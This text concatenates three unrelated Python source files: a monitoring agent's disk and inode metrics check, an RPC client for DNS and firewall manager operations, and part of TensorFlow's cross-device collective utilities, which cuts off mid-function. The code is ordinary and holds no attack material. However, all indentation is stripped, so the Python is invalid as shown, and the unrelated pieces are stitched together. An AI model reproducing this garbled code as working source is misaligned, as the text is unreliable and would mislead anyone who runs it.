METRIC_DISK = 'system.disk.{0}'
METRIC_INODE = 'system.fs.inodes.{0}'
def __init__(self, name, init_config, agentConfig, instances=None):
if instances is not None and len(instances) > 1:
raise Exception("Disk check only supports one configured instance.")
AgentCheck.__init__(self, name, init_config,
agentConfig, instances=instances)
# Get the configuration once for all
self._load_conf(instances[0])
def check(self, instance):
"""Get disk space/inode stats"""
# Windows and Mac will always have psutil
# (we have packaged for both of them)
if self._psutil():
self.collect_metrics_psutil()
else:
# FIXME: implement all_partitions (df -a)
self.collect_metrics_manually()
@classmethod
def _psutil(cls):
return psutil is not None
def _load_conf(self, instance):
self._excluded_filesystems = instance.get('excluded_filesystems', [])
self._excluded_disks = instance.get('excluded_disks', [])
self._excluded_mountpoint_re = re.compile(
instance.get('excluded_mountpoint_re', '^$'))
self._tag_by_filesystem = _is_affirmative(
instance.get('tag_by_filesystem', False))
self._all_partitions = _is_affirmative(
instance.get('all_partitions', False))
# Force exclusion of CDROM (iso9660) from disk check
self._excluded_filesystems.append('iso9660')
# FIXME: 6.x, drop use_mount option in datadog.conf
self._load_legacy_option(instance, 'use_mount', False,
operation=_is_affirmative)
# FIXME: 6.x, drop device_blacklist_re option in datadog.conf
self._load_legacy_option(instance, 'excluded_disk_re', '^$',
legacy_name='device_blacklist_re',
operation=re.compile)
def _load_legacy_option(self, instance, option, default,
legacy_name=None, operation=lambda l: l):
value = instance.get(option, default)
legacy_name = legacy_name or option
if value == default and legacy_name in self.agentConfig:
self.log.warn(
"Using `{0}` in stackstate.conf has been deprecated"
" in favor of `{1}` in disk.yaml".format(legacy_name, option)
)
value = self.agentConfig.get(legacy_name) or default
setattr(self, '_{0}'.format(option), operation(value))
def collect_metrics_psutil(self):
self._valid_disks = {}
for part in psutil.disk_partitions(all=True):
# we check all exclude conditions
if self._exclude_disk_psutil(part):
continue
# Get disk metrics here to be able to exclude on total usage
try:
disk_usage = timeout(5)(psutil.disk_usage)(part.mountpoint)
except TimeoutException:
self.log.warn(
u"Timeout while retrieving the disk usage of `%s` mountpoint. Skipping...",
part.mountpoint
)
continue
except Exception as e:
self.log.warn("Unable to get disk metrics for %s: %s", part.mountpoint, e)
continue
# Exclude disks with total disk size 0
if disk_usage.total == 0:
continue
# For later, latency metrics
self._valid_disks[part.device] = (part.fstype, part.mountpoint)
self.log.debug('Passed: {0}'.format(part.device))
tags = [part.fstype, 'filesystem:{}'.format(part.fstype)] if self._tag_by_filesystem else []
device_name = part.mountpoint if self._use_mount else part.device
# legacy check names c: vs psutil name C:\\
if Platform.is_win32():
device_name = device_name.strip('\\').lower()
for metric_name, metric_value in self._collect_part_metrics(part, disk_usage).iteritems():
self.gauge(metric_name, metric_value,
tags=tags, device_name=device_name)
# And finally, latency metrics, a legacy gift from the old Windows Check
if Platform.is_win32():
self.collect_latency_metrics()
def _exclude_disk_psutil(self, part):
# skip cd-rom drives with no disk in it; they may raise
# ENOENT, pop-up a Windows GUI error for a non-ready
# partition or just hang;
# and all the other excluded disks
return ((Platform.is_win32() and ('cdrom' in part.opts or
part.fstype == '')) or
self._exclude_disk(part.device, part.fstype, part.mountpoint))
def _exclude_disk(self, name, filesystem, mountpoint):
"""
Return True for disks we don't want or that match regex in the config file
"""
name_empty = not name or name == 'none'
# allow empty names if `all_partitions` is `yes` so we can evaluate mountpoints
if name_empty and not self._all_partitions:
return True
# device is listed in `excluded_disks`
elif not name_empty and name in self._excluded_disks:
return True
# device name matches `excluded_disk_re`
elif not name_empty and self._excluded_disk_re.match(name):
return True
# device mountpoint matches `excluded_mountpoint_re`
elif self._excluded_mountpoint_re.match(mountpoint):
return True
# fs is listed in `excluded_filesystems`
elif filesystem in self._excluded_filesystems:
return True
# all good, don't exclude the disk
else:
return False
def _collect_part_metrics(self, part, usage):
metrics = {}
for name in ['total', 'used', 'free']:
# For legacy reasons, the standard unit it kB
metrics[self.METRIC_DISK.format(name)] = getattr(usage, name) / 1024.0
# FIXME: 6.x, use percent, a lot more logical than in_use
metrics[self.METRIC_DISK.format('in_use')] = usage.percent / 100.0
if Platform.is_unix():
metrics.update(self._collect_inodes_metrics(part.mountpoint))
return metrics
def _collect_inodes_metrics(self, mountpoint):
metrics = {}
# we need to timeout this, too.
try:
inodes = timeout(5)(os.statvfs)(mountpoint)
except TimeoutException:
self.log.warn(
u"Timeout while retrieving the disk usage of `%s` mountpoint. Skipping...",
mountpoint
)
return metrics
except Exception as e:
self.log.warn("Unable to get disk metrics for %s: %s", mountpoint, e)
return metrics
if inodes.f_files != 0:
total = inodes.f_files
free = inodes.f_ffree
metrics[self.METRIC_INODE.format('total')] = total
metrics[self.METRIC_INODE.format('free')] = free
metrics[self.METRIC_INODE.format('used')] = total - free
# FIXME: 6.x, use percent, a lot more logical than in_use
metrics[self.METRIC_INODE.format('in_use')] = \
(total - free) / float(total)
return metrics
def collect_latency_metrics(self):
for disk_name, disk in psutil.disk_io_counters(True).iteritems():
self.log.debug('IO Counters: {0} -> {1}'.format(disk_name, disk))
# x100 to have it as a percentage,
# /1000 as psutil returns the value in ms
read_time_pct = disk.read_time * 100.0 / 1000.0
write_time_pct = disk.write_time * 100.0 / 1000.0
self.rate(self.METRIC_DISK.format('read_time_pct'),
read_time_pct, device_name=disk_name)
self.rate(self.METRIC_DISK.format('write_time_pct'),
write_time_pct, device_name=disk_name)
# no psutil, let's use df
def collect_metrics_manually(self):
df_out, _, _ = get_subprocess_output(self.DF_COMMAND + ['-k'], self.log)
self.log.debug(df_out)
for device in self._list_devices(df_out):
self.log.debug("Passed: {0}".format(device))
tags = [device[1], 'filesystem:{}'.format(device[1])] if self._tag_by_filesystem else []
device_name = device[-1] if self._use_mount else device[0]
for metric_name, value in self._collect_metrics_manually(device).iteritems():
self.gauge(metric_name, value, tags=tags,
device_name=device_name)
def _collect_metrics_manually(self, device):
result = {}
used = float(device[3])
free = float(device[4])
# device is
# ["/dev/sda1", "ext4", 524288, 171642, 352646, "33%", "/"]
result[self.METRIC_DISK.format('total')] = float(device[2])
result[self.METRIC_DISK.format('used')] = used
result[self.METRIC_DISK.format('free')] = free
# Rather than grabbing in_use, let's calculate it to be more precise
result[self.METRIC_DISK.format('in_use')] = used / (used + free)
result.update(self._collect_inodes_metrics(device[-1]))
return result
def _keep_device(self, device):
# device is for Unix
# [/dev/disk0s2, ext4, 244277768, 88767396, 155254372, 37%, /]
# First, skip empty lines.
# then filter our fake hosts like 'map -hosts'.
# Filesystem Type 1024-blocks Used Available Capacity Mounted on
# /dev/disk0s2 ext4 244277768 88767396 155254372 37% /
# map -hosts tmpfs 0 0 0 100% /net
# and finally filter out fake devices
return (device and len(device) > 1 and
device[2].isdigit() and
not self._exclude_disk(device[0], device[1], device[6]))
def _flatten_devices(self, devices):
# Some volumes are stored on their own line. Rejoin them here.
previous = None
for parts in devices:
if len(parts) == 1:
previous = parts[0]
elif previous is not None:
# collate with previous line
parts.insert(0, previous)
previous = None
else:
previous = None
return devices
def _list_devices(self, df_output):
"""
Given raw output for the df command, transform it into a normalized
list devices. A 'device' is a list with fields corresponding to the
output of df output on each platform.
"""
all_devices = [l.strip().split() for l in df_output.splitlines()]
# Skip the header row and empty lines.
raw_devices = [l for l in all_devices[1:] if l]
# Flatten the disks that appear in the mulitple lines.
flattened_devices = self._flatten_devices(raw_devices)
# Filter fake or unwanteddisks.
return [d for d in flattened_devices if self._keep_device(d)]
| |
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging as messaging
from nca47.common import rpc
from nca47.common.i18n import _LI
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
DNS_MANAGER_API = None
FW_MANAGER_API = None
class DNSManagerAPI(object):
"""
Client side of the DNS manager RPC API.
API version history:
1.0 - Initial version
"""
RPC_API_VERSION = '1.0'
def __init__(self, topic='dns_manager'):
rpc.init(CONF)
target = messaging.Target(topic=topic, version=self.RPC_API_VERSION)
self.client = rpc.get_client(target, version_cap=self.RPC_API_VERSION)
@classmethod
def get_instance(cls):
"""
The rpc.get_client() which is called upon the API object initialization
will cause a assertion error if the designate.rpc.TRANSPORT isn't setup
by rpc.init() before.
This fixes that by creating the rpcapi when demanded.
"""
global DNS_MANAGER_API
if not DNS_MANAGER_API:
DNS_MANAGER_API = cls()
return DNS_MANAGER_API
# Zone Methods
def create_zone(self, context, zone):
LOG.info(_LI("create_zone: Calling central's create_zone."))
return self.client.call(context, 'create_zone', zone=zone)
def update_zone(self, context, zone, zone_id):
LOG.info(_LI("update_zone: Calling central's update_zone."))
return self.client.call(context, 'update_zone', zone=zone,
zone_id=zone_id)
def update_zone_owners(self, context, zone, zone_id):
LOG.info(_LI("update_zone_owners: Calling central's update_zone."))
return self.client.call(context, 'update_zone_owners', zone=zone,
zone_id=zone_id)
def delete_zone(self, context, zone, zone_id):
LOG.info(_LI("delete_zone: Calling central's delete_zone."))
return self.client.call(context, 'delete_zone', zone=zone,
zone_id=zone_id)
def get_zone_one(self, context, zone_id):
LOG.info(_LI("get_zone_one: Replying rpc client's"
"get_zone_one."))
return self.client.call(context, 'get_zone_one',
zone_id=zone_id)
def get_zones(self, context):
LOG.info(_LI("get_zones: Replying rpc client's get_zones."))
return self.client.call(context, 'get_zones')
# Zone_records Methods
def create_record(self, context, records_dic, zone_id):
LOG.info(_LI("create_zone_records: Calling central's"
"create_zone_record."))
return self.client.call(context, 'create_record',
records_dic=records_dic, zone_id=zone_id)
def get_records(self, context, zone_id):
LOG.info(_LI("get_zone_record: Calling central's get_zone_record."))
'''return self.client.call(context, 'get_record', zone_id=zone_id,
rrs_id=rrs_id)'''
return self.client.call(context, 'get_records', zone_id=zone_id)
def update_record(self, context, records_dic, zone_id, rrs_id):
LOG.info(_LI("update_zone_record: Calling central's"
"update_zone_record."))
return self.client.call(context, 'update_record',
records_dic=records_dic, zone_id=zone_id,
record_id=rrs_id)
def delete_record(self, context, records_dic, zone_id, rrs_id):
LOG.info(_LI("delete_zone_record: Calling central's"
"delete_zone_record."))
return self.client.call(context, 'delete_record',
records_dic=records_dic, zone_id=zone_id,
record_id=rrs_id)
def del_cache(self, context, cache_dic):
LOG.info(_LI("del_cache: Calling central's del_cache."))
return self.client.call(context, 'del_cache', cache_dic=cache_dic)
class FWManagerAPI(object):
"""
Client side of the Firewall manager RPC API.
API version history:
1.0 - Initial version
"""
RPC_API_VERSION = '1.0'
def __init__(self, topic='firewall_manager'):
rpc.init(CONF)
target = messaging.Target(topic=topic, version=self.RPC_API_VERSION)
self.client = rpc.get_client(target, version_cap=self.RPC_API_VERSION)
@classmethod
def get_instance(cls):
"""
The rpc.get_client() which is called upon the API object initialization
will cause a assertion error if the designate.rpc.TRANSPORT isn't setup
by rpc.init() before.
This fixes that by creating the rpcapi when demanded.
"""
global FW_MANAGER_API
if not FW_MANAGER_API:
FW_MANAGER_API = cls()
return FW_MANAGER_API
def create_record(self, context, records_dic, zone_id):
LOG.info(_LI("create_zone_records: Calling central's"
"create_zone_record."))
return self.client.call(context, 'create_record',
records_dic=records_dic, zone_id=zone_id)
# this is a vlan operation
def creat_vlan(self, context, vlan_infos):
LOG.info(_LI("creat_vlan: Calling central's"
"creat_vlan."))
return self.client.call(context, 'creat_vlan',
vlan_infos=vlan_infos)
def del_vlan(self, context, id_, vlan_infos):
LOG.info(_LI("del_vlan: Calling central's"
"del_vlan."))
return self.client.call(context, 'del_vlan',
id_=id_, vlan_infos=vlan_infos)
def get_vlan(self, context, vlan_infos):
LOG.info(_LI("get_vlan: Calling central's"
"get_vlan."))
return self.client.call(context, 'get_vlan',
vlan_infos=vlan_infos)
def get_vlans(self, context, vlan_infos):
LOG.info(_LI("get_vlans: Calling central's"
"get_vlans."))
return self.client.call(context, 'get_vlans',
vlan_infos=vlan_infos)
# this is a netservice operation
def creat_netservice(self, context, netsev_infos):
LOG.info(_LI("creat_netservice: Calling central's"
"creat_netservice."))
return self.client.call(context, 'creat_netservice',
netsev_infos=netsev_infos)
def del_netservice(self, context, id_, netsev_infos):
LOG.info(_LI("del_netservice: Calling central's"
"del_netservice."))
return self.client.call(context, 'del_netservice',
id_=id_, netsev_infos=netsev_infos)
def get_netservice(self, context, netsev_infos):
LOG.info(_LI("get_netservice: Calling central's"
"get_netservice."))
return self.client.call(context, 'get_netservice',
netsev_infos=netsev_infos)
def get_netservices(self, context, netsev_infos):
LOG.info(_LI("get_netservices: Calling central's"
"get_netservices."))
return self.client.call(context, 'get_netservices',
netsev_infos=netsev_infos)
# this is a addrobj operation
def add_addrobj(self, context, addrobj_infos):
LOG.info(_LI("add_addrobj: Calling central's"
"add_addrobj."))
return self.client.call(context, 'add_addrobj',
addrobj_infos=addrobj_infos)
def del_addrobj(self, context, addrobj_infos):
LOG.info(_LI("del_addrobj: Calling central's"
"del_addrobj."))
return self.client.call(context, 'del_addrobj',
id_=addrobj_infos['id'],
addrobj_infos=addrobj_infos)
def get_addrobj(self, context, addrobj_infos):
LOG.info(_LI("get_addrobj: Calling central's"
"get_addrobj."))
return self.client.call(context, 'get_addrobj',
addrobj_infos=addrobj_infos)
def get_addrobjs(self, context, addrobj_infos):
LOG.info(_LI("get_addrobjs: Calling central's"
"get_addrobjs."))
return self.client.call(context, 'get_addrobjs',
addrobj_infos=addrobj_infos)
# this is a snataddrpool operation
def add_snataddrpool(self, context, snataddrpool_infos):
LOG.info(_LI("add_snataddrpool: Calling central's"
"add_snataddrpool."))
return self.client.call(context, 'add_snataddrpool',
snataddrpool_infos=snataddrpool_infos)
def del_snataddrpool(self, context, snataddrpool_infos):
LOG.info(_LI("del_snataddrpool: Calling central's"
"del_snataddrpool."))
return self.client.call(context, 'del_snataddrpool',
id_=snataddrpool_infos['id'],
snataddrpool_infos=snataddrpool_infos)
def get_snataddrpool(self, context, snataddrpool_infos):
LOG.info(_LI("get_snataddrpool: Calling central's"
"get_snataddrpool."))
return self.client.call(context, 'get_snataddrpool',
snataddrpool_infos=snataddrpool_infos)
def get_snataddrpools(self, context, snataddrpool_infos):
LOG.info(_LI("get_snataddrpools: Calling central's"
"get_snataddrpools."))
return self.client.call(context, 'get_snataddrpools',
snataddrpool_infos=snataddrpool_infos)
| |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for cross_device_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import threading
from tensorflow.python.distribute import values as value_lib
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nccl_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import tf_logging as logging
INSTANCE_KEY_START_NUMBER = 100
def aggregate_gradients_using_nccl(replica_grads):
"""Aggregate gradients using nccl allreduce."""
agg_all_g_and_v = []
for single_g_and_v in zip(*replica_grads):
single_grads = [g for g, _ in single_g_and_v]
agg_grads = nccl_ops.all_sum(single_grads)
agg_all_g_and_v.append(
[(g, v) for g, (_, v) in zip(agg_grads, single_g_and_v)])
agg_all_g_and_v = list(zip(*agg_all_g_and_v))
return agg_all_g_and_v
def aggregate_gradients_using_hierarchical_copy(avail_devices, replica_grads):
"""Aggregate gradients using hierarchical copies.
Args:
avail_devices: available GPU devices.
replica_grads: List of lists of (gradient, variable) tuples. The outer list
is over replicas. The inner list is over individual gradients.
Returns:
The list of (aggregated_gradient, variable), where the gradient has been
summed across all replicas and the variable is chosen from the first
replica.
"""
# This only works for DGX-1 type of machine topology
# Device peer to peer matrix
# DMA: 0 1 2 3 4 5 6 7
# 0: Y Y Y Y Y N N N
# 1: Y Y Y Y N Y N N
# 2: Y Y Y Y N N Y N
# 3: Y Y Y Y N N N Y
# 4: Y N N N Y Y Y Y
# 5: N Y N N Y Y Y Y
# 6: N N Y N Y Y Y Y
# 7: N N N Y Y Y Y Y
agg_grads = []
num_devices = len(avail_devices)
# In the special case of DGX-1 machine topology, the two groups have equal
# size.
group_size = num_devices // 2
for i, single_grads in enumerate(zip(*replica_grads)):
group_0_main_device = i % num_devices
group_1_main_device = (group_0_main_device + group_size) % num_devices
if group_0_main_device < group_size:
group_0_begin = 0
group_1_begin = group_size
else:
group_0_begin = group_size
group_1_begin = 0
# Aggregate the first group.
group_0_device_grads = single_grads[group_0_begin:
group_0_begin + group_size]
with ops.device(avail_devices[group_0_main_device]):
group_0_agg_grads, _ = aggregate_single_gradient_using_copy(
group_0_device_grads, False, False)
# Aggregate the second group.
group_1_device_grads = single_grads[group_1_begin:
group_1_begin + group_size]
with ops.device(avail_devices[group_1_main_device]):
group_1_agg_grads, _ = aggregate_single_gradient_using_copy(
group_1_device_grads, False, False)
# Aggregate between the groups.
with ops.device(avail_devices[group_0_main_device]):
(agg_total_grads, _), _ = aggregate_single_gradient_using_copy(
[group_0_agg_grads, group_1_agg_grads], False, False)
# Broadcast the result back into the root of each group.
with ops.device(avail_devices[group_0_main_device]):
group_0_agg_grads_bcast = array_ops.identity(agg_total_grads)
with ops.device(avail_devices[group_1_main_device]):
group_1_agg_grads_bcast = array_ops.identity(agg_total_grads)
agg_grads_bcast = []
for j in range(len(single_grads)):
with ops.device(avail_devices[j]):
# Broadcast the result back to each member in the group from the root.
if (group_0_main_device < group_size) == (j < group_size):
src_device_grad = group_0_agg_grads_bcast
else:
src_device_grad = group_1_agg_grads_bcast
agg_grads_bcast.append(array_ops.identity(src_device_grad))
agg_grads.append(
[(g, v) for g, (_, v) in zip(agg_grads_bcast, single_grads)])
agg_grads = list(zip(*agg_grads))
return agg_grads
def aggregate_single_gradient_using_copy(grad_and_vars, use_mean,
check_inf_nan):
"""Calculate the average gradient for a shared variable across all replicas.
Note that this function provides a synchronization point across all replicas.
Args:
grad_and_vars: A list or tuple of (gradient, variable) tuples. Each
(gradient, variable) pair within the outer list represents the gradient
of the variable calculated for a single replica, and the number of pairs
equals the number of replicas.
use_mean: if True, mean is taken, else sum of gradients is taken.
check_inf_nan: check grads for nans and infs.
Returns:
The tuple ([(average_gradient, variable),], has_nan_or_inf) where the
gradient has been averaged across all replicas. The variable is chosen
from the first replica. The has_nan_or_inf indicates the grads has nan or
inf.
"""
grads = [g for g, _ in grad_and_vars]
grad = math_ops.add_n(grads)
if use_mean and len(grads) > 1:
grad = array_ops.multiply(grad, 1.0 / len(grads))
v = grad_and_vars[0][1]
if check_inf_nan:
has_nan_or_inf = array_ops.logical_not(
array_ops.reduce_all(array_ops.is_finite(grads)))
return (grad, v), has_nan_or_inf
else:
return (grad, v), None
# TODO(yuefengz): use random key starts to avoid reusing keys?
class CollectiveKeys(object):
"""Class that manages collective keys.
We need to manage three different keys for collective:
*Group key*: an integer key to identify the set of cooperative devices.
Collective ops work under the same set of devices must using the same group
key.
*Instance key*: an integer key to identify the set of same counterpart of
tensors on different devices in a device group that need to be all-reduced.
This class is thread safe.
"""
def __init__(self, group_key_start=1):
"""Initializes the object.
Args:
group_key_start: the starting integer of group key.
"""
self._group_key = group_key_start
self._group_key_table = {}
self._instance_key_table = {}
self._lock = threading.Lock()
def get_group_key(self, devices):
"""Returns a group key for the set of devices.
Args:
devices: a list of canonical device strings in a collective group.
Returns:
int key uniquely identifying the set of device names.
"""
key_id = hash(tuple(sorted(devices)))
with self._lock:
if key_id not in self._group_key_table:
new_key = self._group_key
self._group_key += 1
self._group_key_table[key_id] = new_key
self._instance_key_table[new_key] = {}
for device in devices:
self._instance_key_table[new_key][device] = INSTANCE_KEY_START_NUMBER
return self._group_key_table[key_id]
def get_instance_key(self, group_key, device):
"""Returns a new instance key for use in defining a collective op.
You should call this once per each collective op of a collective instance.
Args:
group_key: the group key returned by get_group_key(). You should not
assign the group key yourself.
device: a canonical device string. It should be the device this collective
op is on.
Returns:
a new instance key.
Raises:
ValueError: when the group key is invalid or the device is not in the
group.
"""
with self._lock:
group = self._instance_key_table.get(group_key, None)
if group is None:
raise ValueError('group {} not found'.format(group_key))
if device not in group:
raise ValueError('{} not in group {}'.format(device, group_key))
v = group[device]
group[device] += 1
return v
def __deepcopy__(self, memo):
# distribute_coordinator deep-copies the strategy object, so
# CollectiveKeys needs to support deep copy as well.
copied = CollectiveKeys()
copied._group_key = self._group_key
copied._group_key_table = copy.deepcopy(self._group_key_table, memo)
copied._instance_key_table = copy.deepcopy(self._instance_key_table, memo)
return copied
class CollectiveReplicaLauncher(object):
"""Launch collectives on one replica."""
_prefer_unique_instance_key = True
_prefer_ordering_token = True
def __init__(self,
group_key,
group_size,
collective_keys,
device):
self._group_key = group_key
self._group_size = group_size
self._collective_keys = collective_keys
self._device = device
if self._use_ordering_token():
with ops.init_scope(), ops.device(device):
self._ordering_token = resource_variable_ops.ResourceVariable(0.)
else:
self._ordering_token = None
def _control_input(self, control_input):
if control_input is not None and not self._use_ordering_token():
return ops.control_dependencies([control_input])
return ops.NullContextmanager()
def _use_unique_instance_key(self):
if not ops.executing_eagerly_outside_functions():
return False
return CollectiveReplicaLauncher._prefer_unique_instance_key
def _use_ordering_token(self):
# We rely on auto control dep to insert control edges between NCCL calls,
# but for tf1 graph mode auto control dep is not used.
if not ops.executing_eagerly_outside_functions():
return False
return CollectiveReplicaLauncher._prefer_ordering_token
def _next_instance_key(self):
"""Returns the next instance key."""
if self._use_unique_instance_key():
# Assigning instance keys at function building time have issues since
# different workers may retrace the function at different times. With
# collective V2 we can use capture_call_time_value to use a placeholder as
# the instance key and feed it at function call time. In this way we also
# don't reuse instance keys, which allows for per-instance cancellation.
graph = ops.get_default_graph()
# Control flow ops don't work with capture_call_time_value, so we put the
# capture in the function graph of that control flow op.
while getattr(graph, 'is_control_flow_graph', False):
graph = graph.outer_graph
if not context.executing_eagerly() and graph.building_function:
with graph.as_default():
# Capture self._next_instance_key so that when building a function
# that calls another tf.function, the instance key assignment is
# further delayed until we actually call the function in eager. Note
# that capture_call_time_value doesn't automatically propagate the
# deferred capture to the outer function.
return graph.capture_call_time_value(
self._next_instance_key, tensor_spec.TensorSpec([], dtypes.int32))
else:
instance_key = self._collective_keys.get_instance_key(
self._group_key, self._device)
with ops.device('CPU:0'):
return ops.convert_to_tensor(instance_key, dtype=dtypes.int32)
else:
return self._collective_keys.get_instance_key(self._group_key,
self._device)
def _get_ordering_token(self, communication_hint):
if self._use_ordering_token() and communication_hint == 'NCCL':
return self._ordering_token.handle
return None
def can_order_nccl(self):
"""Whether this launcher can order NCCL operations."""
return self._use_ordering_token()
def all_reduce(self,
input_tensor,
control_input=None,
communication_hint='AUTO',
timeout=0):
"""All-reduce a dense tensor.
Args:
input_tensor: a dense tensor. It must have the same shape on all replicas.
control_input: if not None, add control edges between control_input and
the all-reduce.
communication_hint: string providing hint to runtime for choosing
collective implementation.
timeout: a float. The timeout in seconds.
Returns:
The reduced tensor.
"""
instance_key = self._next_instance_key()
ordering_token = self._get_ordering_token(communication_hint)
with ops.device(self._device), \
self._control_input(control_input):
return collective_ops.all_reduce_v2(
input_tensor,
self._group_size,
self._group_key,
instance_key,
communication_hint=communication_hint,
timeout=timeout,
ordering_token=ordering_token)
def _all_gather(self, input_tensor, communication_hint='AUTO', timeout=0):
"""All-gather a dense tensor.
Args:
input_tensor: a dense tensor. It must have the same shape on all replicas.
communication_hint: string providing hint to runtime for choosing
collective implementation.
timeout: a float. The timeout in seconds.
Returns:
The reduced tensor.
"""
instance_key = self._next_instance_key()
ordering_token = self._get_ordering_token(communication_hint)
with ops.device(self._device):
return collective_ops.all_gather_v2(
input_tensor,
self._group_size,
self._group_key,
instance_key,
communication_hint=communication_hint,
timeout=timeout,
ordering_token=ordering_token)
def batch_all_reduce(self,
input_tensor_packs,
communication_hint='AUTO',
timeout=0):
"""Batch all-reduce dense tensors.
This takes a list of batches of tensors. Using multiple batches have the
benefit that it doesn't need to wait for all inputs to be ready to start the
all-reduce.
Args:
input_tensor_packs: a list of lists of dense tensors.
communication_hint: string providing hint to runtime for choosing
collective implementation.
timeout: a float. The timeout in seconds.
Returns:
A flat list of reduced tensors.
"""
outputs = []
for pack in input_tensor_packs:
if context.executing_eagerly():
# We don't batch in eager as it sometimes makes the performance worse
# due the concat/split ops.
for input_tensor in pack:
outputs.append(
self.all_reduce(input_tensor, None, communication_hint, timeout))
else:
# TODO(b/169168846): inserts a parallel all_gather to verify packings
# are the same on each replica.
with ops.device(self._device):
flat_tensors = [array_ops.reshape(t, [-1]) for t in pack]
shapes = [array_ops.shape(t) for t in pack]
if communication_hint == 'NCCL' and outputs:
control_input = outputs[-1]
else:
control_input = None
reduced = self.all_reduce(
array_ops.concat(flat_tensors, axis=0), control_input,
communication_hint, timeout)
num_elements = [math_ops.reduce_prod(s) for s in shapes]
flat_outputs = array_ops.split(reduced, num_elements, axis=0)
for shape, flat_output in zip(shapes, flat_outputs):
outputs.append(array_ops.reshape(flat_output, shape))
return outputs
def all_gather(self,
input_tensor,
axis,
communication_hint='AUTO',
timeout=0):
"""All-gather a dense tensor.
This method must be called inside a tf.function.
Args:
input_tensor: a dense tensor. It must have the same rank on all replicas,
and dimensions other than `axis` need to be the same as well.
axis: 0-D int32 Tensor. Dimension along which to gather. Must be in the
range [0, rank(value)).
communication_hint: string providing hint to runtime for choosing
collective implementation. Available options are `AUTO`, `NCCL`, and
`RING`.
timeout: a float. The timeout in seconds.
Returns:
The gathered Tensor.
Raises:
RuntimeError: if called in eager mode.
"""
if context.executing_eagerly():
raise RuntimeError('all_gather in eager mode is not supported')
with ops.device(self._device), \
ops.control_dependencies([array_ops.identity(input_tensor)]):
# 1. Transpose
# E.g. Given an input_tensor with shape [2,2,5,1] and axis to gather is 3,
# we use perm_pre=[3 0 1 2] to reshape it to [1,2,2,5], which
# brings the 3rd dim first; afterwards we use perm_after=[1,2,3,0] to
# place it back.
perm_pre = array_ops.concat(
([axis], math_ops.range(axis),
math_ops.range(axis + 1, array_ops.rank(input_tensor))),
axis=0)
input_tensor_t = array_ops.transpose(input_tensor, perm=perm_pre)
# 2. Pad
gathered_shape = self._all_gather(
array_ops.expand_dims_v2(array_ops.shape_v2(input_tensor_t), axis=0),
communication_hint,
timeout=timeout)
first_dims = gathered_shape[:, 0]
full_axis_dim = math_ops.reduce_max(first_dims)
padded_input_tensor = _pad_util(input_tensor_t, full_axis_dim)
# 3. Gather
gather_padded_out_tensor = self._all_gather(
padded_input_tensor, communication_hint, timeout=timeout)
# 4. Unpad
split_tensors = []
for i in range(self._group_size):
start_pos = i * full_axis_dim
split_tensors.append(gather_padded_out_tensor[start_pos:start_pos +
first_dims[i]])
out_tensor_t = array_ops.concat(split_tensors, 0)
# 5. Transpose back
perm_after = array_ops.concat(
(math_ops.range(1, axis + 1), [0],
math_ops.range(axis + 1, array_ops.rank(input_tensor_t))),
axis=0)
return array_ops.transpose(out_tensor_t, perm=perm_after)
def all_reduce_indexed_slices(self,
input_slices,
communication_hint='AUTO',
timeout=0):
"""All-reduce an IndexedSlices.
This method must be called inside a tf.function.
Args:
input_slices: an IndexedSlices.
communication_hint: string providing hint to runtime for choosing
collective implementation.
timeout: a float. The timeout in seconds.
Returns:
The reduced IndexedSlices.
Raises:
RuntimeError: if called in eager mode.
"""
if context.executing_eagerly():
raise RuntimeError(
'all_reduce_indexed_slices in eager mode is not supported')
# Current CollectiveAllGather implementations require input IndexedSlices to
# have consistent length across the board, we handle the reduction of
# IndexedSlices as follows:
# 1. Gather the lengths of IndexedSlices from all participants.
# 2. If they have consistent length, apply all_gather.
# 3. Otherwise convert IndexedSlices to dense tensors and apply
# all_reduce.
with ops.device(self._device):
def all_gather():
"""Use all_gather to aggregate `IndexedSlices`."""
all_values = self._all_gather(
input_slices.values, communication_hint, timeout=timeout)
# Add control dependency to order the all-gather.
control = [all_values] if communication_hint == 'NCCL' else []
with ops.control_dependencies(control):
all_indices = self._all_gather(
input_slices.indices, communication_hint, timeout=timeout)
return ops.IndexedSlices(
values=all_values,
indices=all_indices,
dense_shape=input_slices.dense_shape)
def densify_and_all_reduce():
"""Use all_reduce to aggregate `IndexedSlices`."""
densified = ops.convert_to_tensor(input_slices)
reduced = self.all_reduce(
densified, communication_hint=communication_hint, timeout=timeout)
# We have to convert dense grad to IndexedSlice because all_reduce()
# and all_gather() must have the same return type as required by
# control_flow_ops.cond.
return ops.IndexedSlices(
values=reduced,
indices=math_ops.range(array_ops.shape(reduced)[0]),
dense_shape=input_slices.dense_shape)
length = array_ops.shape(input_slices.indices)
all_lengths = self._all_gather(
length, communication_hint, timeout=timeout)
return control_flow_ops.cond(
math_ops.equal(
math_ops.reduce_max(all_lengths),
math_ops.reduce_min(all_lengths)), all_gather,
densify_and_all_reduce)
def aggregate_tensors_or_indexed_slices(values, accumulation_fn=math_ops.add_n):
"""Aggregate tensors using `accumulation_fn` and IndexedSlices via concat."""
if any(isinstance(v, ops.IndexedSlices) for v in values):
return backprop.aggregate_indexed_slices_gradients(values)
else:
return accumulation_fn(values)
def divide_by_n_tensors_or_indexed_slices(value, n):
if isinstance(value, ops.IndexedSlices):
value = backprop.flatten_nested_indexed_slices(value)
return ops.IndexedSlices(
value.values / n, value.indices, value.dense_shape)
else:
return value / n
def copy_tensor_or_indexed_slices_to_device(value, device):
with ops.device(device):
if isinstance(value, ops.IndexedSlices):
copied_values = array_ops.identity(value.values)
copied_indices = array_ops.identity(value.indices)
